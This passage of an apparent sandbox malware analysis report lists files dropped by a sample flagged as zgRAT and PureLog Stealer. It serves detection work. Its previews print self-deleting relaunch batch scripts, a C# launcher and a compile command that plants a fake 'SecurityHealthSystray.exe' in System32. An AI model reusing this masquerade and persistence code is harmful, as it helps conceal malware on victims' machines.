                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.log

                                                            Download File
                                                            Process:C:\Recovery\dwm.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.354334472896228
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\iEIWJugOSvvEyboGDFYpQ.exe.log

                                                            Download File
                                                            Process:C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):847
                                                            Entropy (8bit):5.354334472896228
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\smartscreen.exe.log

                                                            Download File
                                                            Process:C:\Windows\Resources\Themes\smartscreen.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):1523
                                                            Entropy (8bit):5.373534083924954
                                                            Encrypted:false
                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mC1qE4GIs0E4KD:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT41
                                                            MD5:5E675003E8A6113031BC81EC692CFE0A
                                                            SHA1:53FAFEED5B3E6489BDD729B50C948DD00A7CBC83
                                                            SHA-256:5A74192EB3D5A96FA18278AD0D7B9B4D791830D7F2ED7C70B3746B0A635DF24F
                                                            SHA-512:4F22E0ED4CF9ED3CA13DF90EC96DE2257128EFD5B67579DC822386D6233836F1EA3E11DAEB1DB36227CB5B2C595F8C296A2EB0706D356B6C86EA98A4FCC018D7
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                                            C:\Users\user\AppData\Local\Temp\RESF1F4.tmp

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6f0, 10 symbols, created Sun Dec 29 00:07:15 2024, 1st section name ".debug$S"
                                                            Category:dropped
                                                            Size (bytes):1960
                                                            Entropy (8bit):4.552032381052421
                                                            Encrypted:false
                                                            SSDEEP:24:HxS9YHOO3NPDfHewKHF1qnN0luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+GUZ:F/97dKHF1yyluOulajfqXSfbNtmhxZ
                                                            MD5:7FDCB2C08C4787FB292D1603BAAA0ABC
                                                            SHA1:ED65C666E45203DD1B975C8B9B20AF32C42F0EF7
                                                            SHA-256:A11EB967165519C0081B53A8C79BCAB341E0D4FD2F3F11B3D44EFA496B4B3303
                                                            SHA-512:9A43FCAC56C97FC14A6BB74A9CE3C8871E3BB44EDD1B5E8E054DFEFFE380C6D13D7ACF9F593393AC2E98AA3AC4EF5A3CE575FF5D8586A06DBF2A400C7A285111
                                                            Malicious:false
                                                            Preview:L.....pg.............debug$S........@...................@..B.rsrc$01................l...........@..@.rsrc$02........p...................@..@........;....c:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP...................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESF1F4.tmp.-.<....................a..Microsoft (R) CVTRES.i.=..cwd.C:\ComproviderComponentIntocommon.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.

                                                            C:\Users\user\AppData\Local\Temp\Ycxw1CWDXu.bat

                                                            Download File
                                                            Process:C:\Windows\Resources\Themes\smartscreen.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):171
                                                            Entropy (8bit):5.073049080774059
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mVtCex8+lA/VovBktKcKZG1t+kiE2J5xAImnoh:hCRLuVFOOr+DE/Cex8+aKvKOZG1wkn2J
                                                            MD5:C0D4761FA8CAE2D8A9099A464928903C
                                                            SHA1:F8DEA03FCF0AF97DAD80DF5C0B79DE3BB919F884
                                                            SHA-256:1B973239A4BBCE38550D6A7AC5EA8F09927F784D6BFB0BD1AD4DA03AB8A7B6C8
                                                            SHA-512:730E78395C4A5C7E8E91F441A9E22DFA9F4EDCD729541C1B0C8D42FFFC741934BD84496D89E7189D27A2357A50E95E36A59AF4DCE988CFE7E36E16699C918F49
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\Resources\Themes\smartscreen.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Ycxw1CWDXu.bat"

                                                            C:\Users\user\AppData\Local\Temp\jdisWpWAyY.bat

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):165
                                                            Entropy (8bit):5.360201433931101
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9m7msB8/j88HyBktKcKZG1t+kiE2J5xAI72yMq:hCRLuVFOOr+DE7NuHyKOZG1wkn23f7P
                                                            MD5:5DF07F6F83D52B02CF72C51EBA14EE81
                                                            SHA1:F6AE134976E258CDA278FBF3FEB90C98D658837A
                                                            SHA-256:F8B26AC75BDF0D91E069F3568E72F5E408012191682D1376F2F341A3D048332F
                                                            SHA-512:41D7F8D8088E2F46FADAF3F067CB714562892E6A59074CFFE2273A728FBF950B02AF9345F13D1C1C95AC59E52D7E60D3A102AD03571F2AC0C2C21E95395CF8B6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\iEIWJugOSvvEyboGDFYpQ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\jdisWpWAyY.bat"

                                                            C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.0.cs

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                            Category:dropped
                                                            Size (bytes):390
                                                            Entropy (8bit):4.862703286231266
                                                            Encrypted:false
                                                            SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLECexWuaiFkD:JNVQIbSfhV7TiFkMSfhUWu7FkD
                                                            MD5:5C593CF50AF5664C0C64273B23BE382C
                                                            SHA1:7162EEA1C445F1B811B7F27E24E4A1FF14FBE5B1
                                                            SHA-256:EE45DFF9A296F688ED5611F4548176616985C48FDF89ACAA419C61074F88B708
                                                            SHA-512:5403EDCC8C250B87D23BB99C414DF49725CFC8361663D25B2F9FE8FCA03C8B00EAA61F4DE7D7867E80DA969668296882F4E2779CE79804389D6B5A7D057D2769
                                                            Malicious:false
                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Windows\Resources\Themes\smartscreen.exe"); } catch { } }).Start();. }.}.

                                                            C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.cmdline

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):250
                                                            Entropy (8bit):5.078704011140092
                                                            Encrypted:false
                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23ffV:Hu7L//TRq79cQWf3V
                                                            MD5:40BBF76E5F4405491C8CEF0145F1F659
                                                            SHA1:55E145BC951B42E39545A0F4475332978B90EED4
                                                            SHA-256:53D08540F097482A2DE1DB253918544979E65514B7EF94BE049B36F24267D1AB
                                                            SHA-512:B8A02E86102C0DFA91A5180571FCCD2DCE1E7F379BFAABF744CCB79D0D343FE2AB17BA9A0993C2FAF476E269B05C6F9F5FC9BD4ACECA9F45DF6B791C172455BF
                                                            Malicious:true
                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.0.cs"

                                                            C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.out

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (340), with CRLF, CR line terminators
                                                            Category:modified
                                                            Size (bytes):761
                                                            Entropy (8bit):5.248847921349353
                                                            Encrypted:false
                                                            SSDEEP:12:M9KjDI/u7L//TRq79cQWf3wKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:OqDI/un/Vq79tWf3wKax5DqBVKVrdFAw
                                                            MD5:A89B744565B1917DC4F48B55CB15E141
                                                            SHA1:6B7B950CB55ED2989F5834EC5EC7E6B171CA4D64
                                                            SHA-256:5B93397AF877AB67A30C33B106E980942DADC18AEDACA26B84CE80B1B557C1D5
                                                            SHA-512:E59009EAF8C940E20B2C9488DF4D9643EAAA58EA61328CEC7CDA8D9B715A30816F8A5758156133C277817575DF0F9D64EC29592C4200C5827559D4A88D26C4B9
                                                            Malicious:false
                                                            Preview:.C:\ComproviderComponentIntocommon> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\jgewpxd5\jgewpxd5.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                            C:\Users\user\AppData\Local\Temp\skygtcjqos

                                                            Download File
                                                            Process:C:\Windows\Resources\Themes\smartscreen.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.163856189774724
                                                            Encrypted:false
                                                            SSDEEP:3:G+TJdTesW:G0J5e3
                                                            MD5:75AAFDE9D36A62EB51B4273AC65B10CA
                                                            SHA1:00ADE28A22EF2DB35F46ED33DE3CFDCB924A43D1
                                                            SHA-256:7EE28802F67AB731F926B24678DD1ECC967CC30A17E6D2F54FEE9DCC57413D96
                                                            SHA-512:3A036FA26E087F29BB2BED50879B600EB22FEF0E8A744B43C21C4D2AB5654D1351B90237B56CB315D119F96DB2B5B0FCFF249852FB0EA2C802A0DE4848885971
                                                            Malicious:false
                                                            Preview:BpI6UJmLol8UySF4IyumYLpd3

                                                            C:\Users\user\AppData\Local\Temp\vRRWDuyWLr

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):25
                                                            Entropy (8bit):4.403856189774723
                                                            Encrypted:false
                                                            SSDEEP:3:YfRc/+oIn:ycsn
                                                            MD5:C7F263A510C61ED5ACC03A977561B393
                                                            SHA1:1CB39968CF1F29F88A6A92771DA3CCB55195BF3D
                                                            SHA-256:8AC54DBF53000821FAB5296D3A2FD3FA9B01FEDDEA44A217BB90E0BBFE5E9DD9
                                                            SHA-512:726B34ADA3380B10C221D7F159D85EFED2FA49C6CFB6AB1F3F314F791EBBD9EACE33A7C5FCD1B21E2A879C13CCB8D4232B143EB0867D09BC3A9C2DECC49C255B
                                                            Malicious:false
                                                            Preview:WAML1QZgo9WRebDBJCRK0QUfq

                                                            C:\Users\user\Desktop\etRRuFlx.log

                                                            Download File
                                                            Process:C:\Windows\Resources\Themes\smartscreen.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Joe Sandbox View:
                                                            • Filename: aimware.exe, Detection: malicious, Browse
                                                            • Filename: ZZ2sTsJFrt.exe, Detection: malicious, Browse
                                                            • Filename: r6cRyCpdfS.exe, Detection: malicious, Browse
                                                            • Filename: tBnELFfQoe.exe, Detection: malicious, Browse
                                                            • Filename: Z4D3XAZ2jB.exe, Detection: malicious, Browse
                                                            • Filename: 67VB5TS184.exe, Detection: malicious, Browse
                                                            • Filename: 4t8f8F3uT1.exe, Detection: malicious, Browse
                                                            • Filename: F3ePjP272h.exe, Detection: malicious, Browse
                                                            • Filename: cbCjTbodwa.exe, Detection: malicious, Browse
                                                            • Filename: vb8DOBZQ4X.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Users\user\Desktop\kwWqKlvO.log

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):32256
                                                            Entropy (8bit):5.631194486392901
                                                            Encrypted:false
                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 25%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                            C:\Windows\Resources\Themes\2afe4ed40d5a86

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):66
                                                            Entropy (8bit):5.21076457377279
                                                            Encrypted:false
                                                            SSDEEP:3:xuAUUDrHG6VVEI7tMZNQn:SqG0pNn
                                                            MD5:9C54C837E380DBE92858CB4C80109A50
                                                            SHA1:8CE172B2BA2B3D43EC14EBA91BAFB43626F6327D
                                                            SHA-256:92C3D0008C840A89D2F22C767F9CCF2ED2B2E5624AE5B889409EB546A79F5337
                                                            SHA-512:80A024789990CEEFF71C4A0D3D3DF800E63FA2F202A2AB30E9E1D024B23B2D1F4228A35B6C2576BC73660A588691A4DD5A75F7B2EA8C2B4340A5835F78E7C369
                                                            Malicious:false
                                                            Preview:UaKf0Cm0hxjvOSeJLIJP1yobXntBUSvdFdANwIXV3pGSaKb1u4vHdtMfvtHNTlfPBG

                                                            C:\Windows\Resources\Themes\smartscreen.exe

                                                            Download File
                                                            Process:C:\ComproviderComponentIntocommon\Portsessionsvc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1688064
                                                            Entropy (8bit):7.441420393206227
                                                            Encrypted:false
                                                            SSDEEP:24576:bBz/sS1IVH3L88k4BeRFEOVqZ9U6adNhA3rjt4fxF3b5EJb7Tgo05ZfOs9:d4788WhV89R243rZ4fxR1EJuZJ
                                                            MD5:5231D0FCCC4F24F5B3D76964B3513636
                                                            SHA1:E6F29FA85FC7B9F590B8E775198D1958E07A0159
                                                            SHA-256:B42346EEE811EFBBCBC433708790E23CF157E6F5C802E7F3C309EA6BBF0FE6E3
                                                            SHA-512:0F20165583314C8B80FE2174BE752361226294098DB9744BB4C376C9B9F372495369EC5394DEFAB86AE6E2317524656EDE8C23E043A688DB78C9D0C7591BB99C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Resources\Themes\smartscreen.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Resources\Themes\smartscreen.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 78%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....8g............................>.... ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text...D.... ...................... ..`.rsrc... ...........................@....reloc..............................@..B................ .......H....... ..................]...f........................................0..........(.... ........8........E............9.......8....(.... ....8....*(.... ....~....{....9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E........R...F.......{...8........~....(h...~....(l... ....?*... ....~....{f...:....& ....8....r...ps....z*~....:.... ....~....{v...:w...& ....8l...~....(`... .... .... ....s....~....(d....... ....86......... ....~....{f...9..

                                                            C:\Windows\System32\CSC14843E573E24440A98F4B13FC0AF1E.TMP

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:MSVC .res
                                                            Category:dropped
                                                            Size (bytes):1224
                                                            Entropy (8bit):4.435108676655666
                                                            Encrypted:false
                                                            SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                            MD5:931E1E72E561761F8A74F57989D1EA0A
                                                            SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                            SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                            SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                            Malicious:false
                                                            Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                            C:\Windows\System32\SecurityHealthSystray.exe

                                                            Download File
                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):4608
                                                            Entropy (8bit):3.936659394390029
                                                            Encrypted:false
                                                            SSDEEP:48:6DrpHPtVM7Jt8Bs3FJsdcV4MKe274p4SvqBHaOulajfqXSfbNtm:QlPMPc+Vx9M4p4SvkEcjRzNt
                                                            MD5:96CC461E99498FB84F90B6D68B20921C
                                                            SHA1:271F71A2D5215A9A2346BAD570533EEF0DF39B6A
                                                            SHA-256:E02F1404346E6AEAE864D2D4D277DFDF24880F8E0C5CC43D93EA31F94A6B2432
                                                            SHA-512:C4E2C959DE25C946F65EBC614FD5D34C9339E87E49C9158BF9DE4ED40D6E618D35D4BF5D7E4638209C37FFDFC7A501016DA9EEB55F8963774A5A595E695EDF45
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                            \Device\Null

                                                            Download File
                                                            Process:C:\Windows\System32\PING.EXE
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):502
                                                            Entropy (8bit):4.613865166769504
                                                            Encrypted:false
                                                            SSDEEP:12:PD5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:ddUOAokItULVDv
                                                            MD5:AEC417D214D9483175B7278C6EE1F67D
                                                            SHA1:A8A133D7CDEC2264B3D3998172D131CA0400A961
                                                            SHA-256:F3C9837C53A21632A2560AC8E1842C5CA8CDE7D700C4047F7AD2C5B672470AE7
                                                            SHA-512:18EF0D607195769222381210C65D264DF6BC9D7A49C3B334F8987F1F425CBE6277BDC28C0E61FD4A1F2B4CE8A50A0A947F3879579B73B34B55CA58057FC1F4F0
                                                            Malicious:false
                                                            Preview:..Pinging 467601 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
